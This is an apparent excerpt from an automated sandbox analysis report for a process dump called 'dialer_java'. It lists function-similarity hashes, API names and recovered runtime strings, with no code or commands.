                                      • Instruction Fuzzy Hash: 814170B3A06B8682DF249F5AE48436DB7A1EB58BC4F448131CB8E577A5EF3DD0818305
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: fputclocaleconv
                                      • String ID:
                                      • API String ID: 697933784-0
                                      • Opcode ID: e7dc6929fcf4cc6b6d4a8017c3bf5789be4cf754bd583aa0524452777b434767
                                      • Instruction ID: 4c3e860da28b129567ebe8463689e3d50db76f06b7044e1fbb2f97748d8e0bc2
                                      • Opcode Fuzzy Hash: e7dc6929fcf4cc6b6d4a8017c3bf5789be4cf754bd583aa0524452777b434767
                                      • Instruction Fuzzy Hash: 43417573F04181C6F3349A6AE58A37E7AA2EB14754F200135DB6E92BC1CE2DE5C28755
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc$memcpy
                                      • String ID:
                                      • API String ID: 1833655766-0
                                      • Opcode ID: 0110527e016c01b0a12a7529867a8ac73845aff24685a5758aca368fee7433c9
                                      • Instruction ID: f0bae6fea31ab01886099a9541d24e08b12f2263417d19f0ac09bfccbb03adc1
                                      • Opcode Fuzzy Hash: 0110527e016c01b0a12a7529867a8ac73845aff24685a5758aca368fee7433c9
                                      • Instruction Fuzzy Hash: 2A3184B3B05B8582DE299F5AF4953697761EB68BC4F048031CB9E577A5DF3DE4818300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: malloc
                                      • String ID: enum$struct$union
                                      • API String ID: 2803490479-1076304440
                                      • Opcode ID: 9eeface4d110fd4f93855d0c537ecc8917bf5016c94e455d4abe1fc3c89d10f7
                                      • Instruction ID: 4874a9c49bc3ba4489e2e499f7aedbb11e7a81a74532f04778c1d1cc5cbb6038
                                      • Opcode Fuzzy Hash: 9eeface4d110fd4f93855d0c537ecc8917bf5016c94e455d4abe1fc3c89d10f7
                                      • Instruction Fuzzy Hash: 29310233709A8180E7048B19E49D77A3AA4EB84B91F544136DE4E973D0DE3DE4C7C305
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc$memcpy
                                      • String ID:
                                      • API String ID: 1833655766-0
                                      • Opcode ID: 92ab20d4474b65fcd413b3cc6ffba1703cdc3f62fa15c2224de3fc87839058f1
                                      • Instruction ID: 868bddec450fe1c302ee7394979b33f6387c275b810421be376b0ae191823204
                                      • Opcode Fuzzy Hash: 92ab20d4474b65fcd413b3cc6ffba1703cdc3f62fa15c2224de3fc87839058f1
                                      • Instruction Fuzzy Hash: 2431D2B3B05B8282DE298F1AF495379B761EB98BC0F048031CB8E57795EF3DE0818205
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: malloc$memcpyrealloc
                                      • String ID:
                                      • API String ID: 2642181057-0
                                      • Opcode ID: 7b5389b9c9a85f3a34e23261bf769740200db070f8f6c41ee47b25707c61576f
                                      • Instruction ID: fc83c6b57ae336a6fc82d7920569253081d57ee7e42dc4009a6bd66bfa211d95
                                      • Opcode Fuzzy Hash: 7b5389b9c9a85f3a34e23261bf769740200db070f8f6c41ee47b25707c61576f
                                      • Instruction Fuzzy Hash: 06310233716B8185DA19CB29E4863A96B95FB08B94F440535CB9D9B3C9EF3DE182C304
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc$memcpy
                                      • String ID:
                                      • API String ID: 1833655766-0
                                      • Opcode ID: 92f0a808aa39fa7eb3d3e1b92975e20d59c52e8dbb1dc89ffce3e6ef201c367b
                                      • Instruction ID: 2a37ebd2bde9c52cfa2e359ff06cc5a1038d5163dc761b815cfcdf04c4d7041f
                                      • Opcode Fuzzy Hash: 92f0a808aa39fa7eb3d3e1b92975e20d59c52e8dbb1dc89ffce3e6ef201c367b
                                      • Instruction Fuzzy Hash: B73191B3B05B4282DE29CF5AF495369A761EB58BC0F048432CB8E577A5EF3DE4818205
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: memcpyrealloc
                                      • String ID: %af
                                      • API String ID: 2500458235-435209106
                                      • Opcode ID: 189d169f33cf6af8ca0065567002fe4ddead3edd4c8bf95d75048c77e3cd1801
                                      • Instruction ID: 132a56ace171dce0c6b008f01e9ede0559cc64fa2a8c8ed9bfbf884ba6b5d626
                                      • Opcode Fuzzy Hash: 189d169f33cf6af8ca0065567002fe4ddead3edd4c8bf95d75048c77e3cd1801
                                      • Instruction Fuzzy Hash: A851BC67B1C6C146D73A8738E580BAD7F61DB92391F048225DF6903BD5EE3EC6468704
                                      APIs
                                      • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6E3A61247), ref: 00007FF6E3A62589
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                      • API String ID: 544645111-395989641
                                      • Opcode ID: 5b47f7b3415e9acf973e285d3e0f13b1c7560d1d6d05a1c3766290b15ed4b865
                                      • Instruction ID: 935f5c1914f639b3418274146c3cda340a5dab0d8f6aa5188ffe4ae25b3f3722
                                      • Opcode Fuzzy Hash: 5b47f7b3415e9acf973e285d3e0f13b1c7560d1d6d05a1c3766290b15ed4b865
                                      • Instruction Fuzzy Hash: 9A518C73F28586D6EB208B2DE8967A83B62EB14B54F044135D91DA3794CF3EE4C5C70A
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: mallocrealloc
                                      • String ID: struct
                                      • API String ID: 948496778-3130185518
                                      • Opcode ID: 35616c4f7b5d9537541ddb626232e0a783046c49ffb19191163ac48addb01a71
                                      • Instruction ID: e537e3abeb30a899a12f0e75d329f2ffd475721a912e15c3f26371f293cb6b34
                                      • Opcode Fuzzy Hash: 35616c4f7b5d9537541ddb626232e0a783046c49ffb19191163ac48addb01a71
                                      • Instruction Fuzzy Hash: 0D41CB77B05B8581EB288B1AE4856A83B64FB59FD1F058232DF8C877A5DF39D492C304
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID: ble for
                                      • API String ID: 471065373-1503916205
                                      • Opcode ID: 7d0b51c97a29845c4b7d3c5cbaae78ce6d4dab227ee38db279accd03066f3836
                                      • Instruction ID: c5b0fbef80065bd8349589cad3f07e78800b7ca378faefb03c38fc334cae78d0
                                      • Opcode Fuzzy Hash: 7d0b51c97a29845c4b7d3c5cbaae78ce6d4dab227ee38db279accd03066f3836
                                      • Instruction Fuzzy Hash: BE319CA3B06B4582EF298F1AE5452687B60FBA8FC0B048032CF9E57760DF2DE4918205
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: malloc
                                      • String ID: std
                                      • API String ID: 2803490479-2826573480
                                      • Opcode ID: 39a9b4e02e6c7c124a628c552a4636f6e40e277c28f87722f2353c0517b7eef5
                                      • Instruction ID: 335bef7626b3449bb5ec98ace259fbf67013d858fb3c7d27bc639799b2909afa
                                      • Opcode Fuzzy Hash: 39a9b4e02e6c7c124a628c552a4636f6e40e277c28f87722f2353c0517b7eef5
                                      • Instruction Fuzzy Hash: E831C13371A78285EA658B1DE0163B93BD4EB04B84F090136DE9D9B391DF3DE1C1831A
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID: vector[
                                      • API String ID: 471065373-3542213508
                                      • Opcode ID: c4488cd4258865b302a78e24845e525baf049f33d3f4fcfc29418687803e7592
                                      • Instruction ID: d949eb53c551a23b2b22904ac5b73f788aed717136d981595c2af76c80a4c891
                                      • Opcode Fuzzy Hash: c4488cd4258865b302a78e24845e525baf049f33d3f4fcfc29418687803e7592
                                      • Instruction Fuzzy Hash: 8531B0B7B05B8582DF288F1AE45522DAB61EB59FC0F008032CF9E577A4DF2DD0928305
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID: &
                                      • API String ID: 471065373-1010288
                                      • Opcode ID: c46aeaef957640738deddb87f16563f99d08ba3b34def948dc4d2f740d61f949
                                      • Instruction ID: 91ae5ab78d5d3cc9d523ee87ce4dd12dd7c39f4b5fc2a5476e92fc4d34410d81
                                      • Opcode Fuzzy Hash: c46aeaef957640738deddb87f16563f99d08ba3b34def948dc4d2f740d61f949
                                      • Instruction Fuzzy Hash: 9F3192B3609B8582DB25CF29F4802ADBBA1E758BC8F048226DB8D57799DF3DD545C301
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: EntryFunctionLookupfflush
                                      • String ID: libunwind: pc not in table, pc=0x%llX
                                      • API String ID: 1930725923-1970586329
                                      • Opcode ID: 3d495f0f2960550110fa8eb07f73b5c1ec580fd706c87246941946c30414a956
                                      • Instruction ID: 0ed1a8a3803bf97f16974382aa98d563078395d556c82573e284b1b027200a7a
                                      • Opcode Fuzzy Hash: 3d495f0f2960550110fa8eb07f73b5c1ec580fd706c87246941946c30414a956
                                      • Instruction Fuzzy Hash: 62319173A15B9181E715CF3CE4823A877A1EF89B88F148339CA8D66795EF3994D1C344
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID: operator$r""
                                      • API String ID: 471065373-3690342460
                                      • Opcode ID: e1620a572d8d04512c69ef91134d241d4fe72b19f885483c170cd34e2c6e07b0
                                      • Instruction ID: 65640748e5499c372cc4c634f1e475558fe66badb101fe4b6f203eb31bb5abb7
                                      • Opcode Fuzzy Hash: e1620a572d8d04512c69ef91134d241d4fe72b19f885483c170cd34e2c6e07b0
                                      • Instruction Fuzzy Hash: 0611B2F7B06B8582DA199F0AE58126CBB61EB58FD0F008432CF4D577A4DF29D5E28300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: _time64
                                      • String ID: %s $[%Y-%m-%d %H:%M:%S]
                                      • API String ID: 1670930206-899559958
                                      • Opcode ID: a058c66051b2317f5e588f79f743636c4437f49c9a2c9167b86e4ef29b80d505
                                      • Instruction ID: fb622665a8dbf02292f0cf30bcfd6cd6757687318b7233245df5be1ec58096bd
                                      • Opcode Fuzzy Hash: a058c66051b2317f5e588f79f743636c4437f49c9a2c9167b86e4ef29b80d505
                                      • Instruction Fuzzy Hash: 6E01A132718B8250E6109B18F8563FA6764EF887D0F400031E98E637949E3DD189C705
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: fprintf
                                      • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                      • API String ID: 383729395-3474627141
                                      • Opcode ID: 0d15dd107c1c7b7ee9c3dbc79bee5512547a48c097ea1489700897209fd66f7b
                                      • Instruction ID: 839fac07a16fa56a6815283e9a467fd437beca87475244c179e9a3e49561fad0
                                      • Opcode Fuzzy Hash: 0d15dd107c1c7b7ee9c3dbc79bee5512547a48c097ea1489700897209fd66f7b
                                      • Instruction Fuzzy Hash: 6EF0C223F1CA8582E6209B2CA9462B96721EB693C1F408235DF4EE7251DF2DE0C28305
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
